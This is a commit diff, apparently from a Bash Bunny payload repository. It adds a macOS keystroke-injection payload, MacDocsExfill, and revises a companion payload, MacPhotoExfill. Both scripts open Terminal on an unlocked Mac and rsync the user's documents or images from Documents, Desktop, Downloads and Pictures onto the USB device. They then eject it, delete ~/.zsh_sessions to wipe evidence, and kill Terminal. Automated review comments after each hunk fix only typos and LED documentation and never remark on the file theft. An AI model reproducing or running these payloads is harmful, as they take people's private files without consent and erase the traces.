Update of MacPhotoExfill & Create MacDocsExfill (#588)

* Update readme.md

* Update payload.txt

* Create MacDocsExfill

* Delete MacDocsExfill

* Add files via upload
pull/620/head
afsh4ck 2023-06-10 03:03:32 +02:00 committed by GitHub
parent 0279a82f4b
commit 37a4d9b42e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 165 additions and 27 deletions

View File

@ -0,0 +1,78 @@
#!/bin/bash
#
# Title: MacDocsExfill
# Author: afsh4ck
# Version: 1.0
# Target: MacOS
# Category: Exfiltration
#
# Exfilter all the images from the principal folders on unlocked MacOS targets.
# Stashes them in /loot/MacDocsExfill
#
# Purple Setup
# Amber..............Attack Mode ON
# Green..............Finished
LED SETUP
ATTACKMODE HID STORAGE ECM_ETHERNET
GET TARGET_HOSTNAME
QUACK DELAY 1000
lootdir=loot/MacDocsExfill/$TARGET_HOSTNAME
mkdir -p /root/udisk/$lootdir
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2000
LED STAGE 1
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Desktop;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
QUACK ENTER
QUACK STRING rsync -av Documents/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Documents ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Desktop/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Desktop ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Downloads/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Downloads ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
# Ensure sincronization
sync
# Cleanup and delete proofs
LED STAGE 2
QUACK ENTER
# Eject BB storage
QUACK STRING diskutil eject /Volumes/BashBunny/
QUACK ENTER
QUACK DELAY 500
# Remove terminal history from current session (commands used in attack won't be visible with the history command)
QUACK STRING rm -r ~/.zsh_sessions
QUACK ENTER
QUACK DELAY 500
# Exit terminal
QUACK STRING killall Terminal
QUACK ENTER
LED FINISH
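Review bot: the header comment on the new payload.txt does not describe what the file does. "Exfilter all the images from the principal folders" is copied from MacPhotoExfill, but this payload only matches `*.{docx,xlsx,pdf}`; change it to "Exfiltrate all the documents ..." and fix "Exfilter" while there. The LED legend in the same header ("Purple Setup", "Amber Attack Mode ON", "Green Finished") matches neither the `LED SETUP` / `LED STAGE 1` / `LED STAGE 2` / `LED FINISH` calls actually issued nor the README's LED table, so one of the three should be made authoritative and the other two brought in line. Also "# Ensure sincronization" should read "synchronization", and "Stashes them in /loot/MacDocsExfill" omits the `/$TARGET_HOSTNAME` subfolder that `lootdir` adds.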

View File

@ -0,0 +1,46 @@
# Mac Docs Exfilter for the BashBunny
_______ ______ ______ __ __
| \ / \ / \ | \ | \
| $$$$$$$\| $$$$$$\| $$$$$$\ | $$ | $$
| $$ | $$| $$ | $$| $$ \$$______ \$$\/ $$
| $$ | $$| $$ | $$| $$ | \ >$$ $$
| $$ | $$| $$ | $$| $$ __ \$$$$$$/ $$$$\
| $$__/ $$| $$__/ $$| $$__/ \ | $$ \$$\
| $$ $$ \$$ $$ \$$ $$ | $$ | $$
\$$$$$$$ \$$$$$$ \$$$$$$ \$$ \$$
* Author: afsh4ck
* Version: 1.0
* Target: MacOS
* Tested on: Ventura 13.3.1
* Category: Exfiltration
# DESCRIPTION
Exfilter all the documents from the principal folders on unlocked MacOS targets.
Stashes them in /loot/MacDocsExfill/$hostname grouped in subfolders:
| Subfolder | Content |
| ------------------ | -------------------------------------------- |
| Documents | All the docs in /root/Documents folder |
| Desktop | All the docs in /root/Desktop folder |
| Downloads | All the docs in /root/Downloads folder |
# IMAGE FORMATS
| Format |
| ------------------ |
| .docx |
| .xlsx |
| .pdf |
# LED STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Green | Setup |
| Yellow Blink | Attack Mode ON |
| Purple Slow | Cleaning all proofs |
| Green Fixed | Finish |
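Review bot: the "# IMAGE FORMATS" heading is wrong for this README; the table under it lists .docx, .xlsx and .pdf, so it should be "# DOCUMENT FORMATS". The subfolder table says the content comes from "/root/Documents", "/root/Desktop" and "/root/Downloads", but the payload uses relative paths (`Documents/`, `Desktop/`, `Downloads/`) resolved from the Terminal's working directory, so the table should describe the user's home folders rather than /root. The LED table (Green / Yellow Blink / Purple Slow / Green Fixed) disagrees with the `LED SETUP`, `LED STAGE 1`, `LED STAGE 2` and `LED FINISH` commands in payload.txt and with the legend in its header comment; update it to the patterns the payload actually shows. "Exfilter" in the description should be "Exfiltrate", and the ASCII banner lines are indented inconsistently (the bullet-prefixed metadata lines immediately follow the art with no blank line).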

View File

@ -2,7 +2,7 @@
#
# Title: MacPhotoExfill
# Author: afsh4ck
# Version: 1.0
# Version: 1.1
# Target: MacOS
# Category: Exfiltration
#
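Review bot: the version bump from 1.0 to 1.1 in the payload header is not mirrored in the MacPhotoExfill README, whose Version line is not touched anywhere in this diff; keep the two in sync, and consider a one-line note in the README on what changed in 1.1 (the cp-to-rsync switch and the LED changes in the later hunks).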
@ -27,7 +27,7 @@ QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2000
LED ATTACK
LED STAGE 1
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
QUACK ENTER
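Review bot: replacing `LED ATTACK` with `LED STAGE 1` changes the pattern the device shows during this phase, but the README's LED table still documents this stage as "Yellow Blink / Attack Mode ON" (see the last hunk of this diff, which leaves that row unchanged). Update the README row together with this change so the documented LED status matches the payload.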
@ -37,33 +37,50 @@ QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Pictures;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
QUACK ENTER
QUACK STRING cp Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
QUACK STRING rsync -av Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
QUACK ENTER
QUACK STRING cp Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING cp Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
QUACK STRING wait;
QUACK ENTER
QUACK STRING cp Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
QUACK STRING rsync -av Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
QUACK ENTER
# We can control the time for the payload execution
QUACK DELAY 25000
QUACK CTRL C
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
# Ensure sincronization
sync
# Cleanup and delete proofs
LED M SLOW
QUACK ENTER
LED STAGE 2
QUACK ENTER
# Eject BB storage
QUACK STRING diskutil eject /Volumes/BashBunny/
QUACK ENTER
QUACK DELAY 500
# Remove terminal history from current session (commands used in attack won't be visible with the history command)
QUACK STRING rm -r ~/.zsh_sessions
QUACK ENTER
QUACK DELAY 500
# Exit terminal
QUACK STRING killall Terminal
QUACK ENTER
# Ensure sincronization
sync
LED FINISH
LED FINISH
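Review bot: the `echo "Please wait..."` / `wait;` pairs added after each rsync are inert: `wait` only blocks on background jobs, and every rsync here runs in the foreground, so by the time `wait` is typed the copy has already completed or failed. Either drop these lines or document what they are for. The rendering of this hunk also ends with two `LED FINISH` lines; confirm the resulting file ends with a single one. `LED M SLOW` (documented in the README as "Purple Slow / Cleaning all proofs") is replaced by `LED STAGE 2` without a corresponding README update, and "# Ensure sincronization" should read "synchronization" in both places it appears.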

View File

@ -1,17 +1,14 @@
# Mac Photo Exfilter for the BashBunny
* ___ ___ ___ ___ ___ ___ ___
* / /\ / /\ / /\ /__/\ / /\ / /\ /__/|
* / /::\ / /:/_ / /:/_ \ \:\ / /::\ / /:/ | |:|
* / /:/\:\ / /:/ /\ / /:/ /\ \__\:\ / /:/\:\ / /:/ | |:|
* / /:/ /::\ / /:/ /:// /:/ /::\ ___ / /::\ / /:/ /::\ / /:/ ___ __| |:|
* /__/:/ /:/\:\/__/:/ /://__/:/ /:/\:\/__/\ /:/\:\/__/:/ /:/\:\/__/:/ / /\/__/\_|:|____
* \ \:\/:/__\/\ \:\/:/ \ \:\/:/ /:/\ \:\/:/__\/\ \:\/:/__\/\ \:\ / /:/\ \:\/:::::/
* \ \::/ \ \::/ \ \::/ /:/ \ \::/ \ \::/ \ \:\ /:/ \ \::/---
* \ \:\ \ \:\ \__\/ /:/ \ \:\ \ \:\ \ \:\/:/ \ \:\
* \ \:\ \ \:\ /__/:/ \ \:\ \ \:\ \ \::/ \ \:\
* \__\/ \__\/ \__\/ \__\/ \__\/ \__\/ \__\/
_______ __ __ ______ ________ ______ __ __
| \ | \ | \ / \| \ / \ | \ | \
| $$$$$$$\| $$ | $$| $$$$$$\\$$$$$$$$| $$$$$$\ | $$ | $$
| $$__/ $$| $$__| $$| $$ | $$ | $$ | $$ | $$ ______ \$$\/ $$
| $$ $$| $$ $$| $$ | $$ | $$ | $$ | $$| \ >$$ $$
| $$$$$$$ | $$$$$$$$| $$ | $$ | $$ | $$ | $$ \$$$$$$/ $$$$\
| $$ | $$ | $$| $$__/ $$ | $$ | $$__/ $$ | $$ \$$\
| $$ | $$ | $$ \$$ $$ | $$ \$$ $$ | $$ | $$
\$$ \$$ \$$ \$$$$$$ \$$ \$$$$$$ \$$ \$$
* Author: afsh4ck
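Review bot: this hunk only swaps the ASCII banner; the "* Version" line that follows the "* Author: afsh4ck" context line is not part of the diff, so the README still advertises the old version while payload.txt now says 1.1. The new banner lines also use inconsistent leading whitespace (some rows are indented by one space, others not), which will misalign the art when rendered as plain text.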
@ -47,4 +44,4 @@ Stashes them in /loot/MacPhotoExfill/$hostname grouped in subfolders:
| Green | Setup |
| Yellow Blink | Attack Mode ON |
| Purple Slow | Cleaning all proofs |
| Green Fixed | Finish |
| Green Fixed | Finish |
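Review bot: the only change in this hunk is to the trailing "| Green Fixed | Finish |" row, which is identical before and after apart from whitespace or the final newline. While this table is being touched, its "Yellow Blink / Attack Mode ON" and "Purple Slow / Cleaning all proofs" rows should be updated, since the payload hunks above replace `LED ATTACK` with `LED STAGE 1` and `LED M SLOW` with `LED STAGE 2`; as committed, the README describes LED patterns the payload no longer uses.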